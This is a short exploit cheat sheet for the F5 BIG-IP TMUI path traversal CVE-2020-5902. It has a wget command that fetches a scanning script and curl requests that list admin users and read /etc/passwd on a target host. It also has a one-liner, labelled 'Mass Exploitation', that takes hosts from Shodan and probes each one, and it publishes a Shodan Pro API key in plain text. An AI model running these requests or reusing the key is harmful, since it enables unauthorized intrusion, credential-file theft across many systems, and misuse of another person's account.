└── assets


/assets:
--------------------------------------------------------------------------------
 1 | #Nmap Script - 
 2 | Download the script : wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse
 3 | Put the IP address & check if Vulnerable : nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse
 4 | 
 5 | 
 6 | #Curl Request - 
 7 | Read the Users/Admin :
 8 | curl -v -k http://host/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin%27
 9 | Read the /etc/passwd file :
10 | curl -v -k http://host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd%27
11 | 
12 | 
13 | #Automation Shodan Script for Mass Exploitation -
14 | shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://%24host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
15 | 
16 | #shodan init YOUR_API_KEY 🔑 
17 | Bonus FREE API KEY (Shodan Pro) Shodan Pro API Key - 
18 | rohit@Rohits-MacBook-Pro ~ % shodan init 61TvA2dNwxNxmWziZxKzR5aO9tFD00Nj
19 | Successfully initialized
20 | rohit@Rohits-MacBook-Pro ~ % shodan info 
21 | Query credits available: 171497
22 | Scan credits available: 65534
23 | 
24 | 
25 | #Thankyou
26 | Best Wishes,
27 | Rohit Gautam
28 | 


--------------------------------------------------------------------------------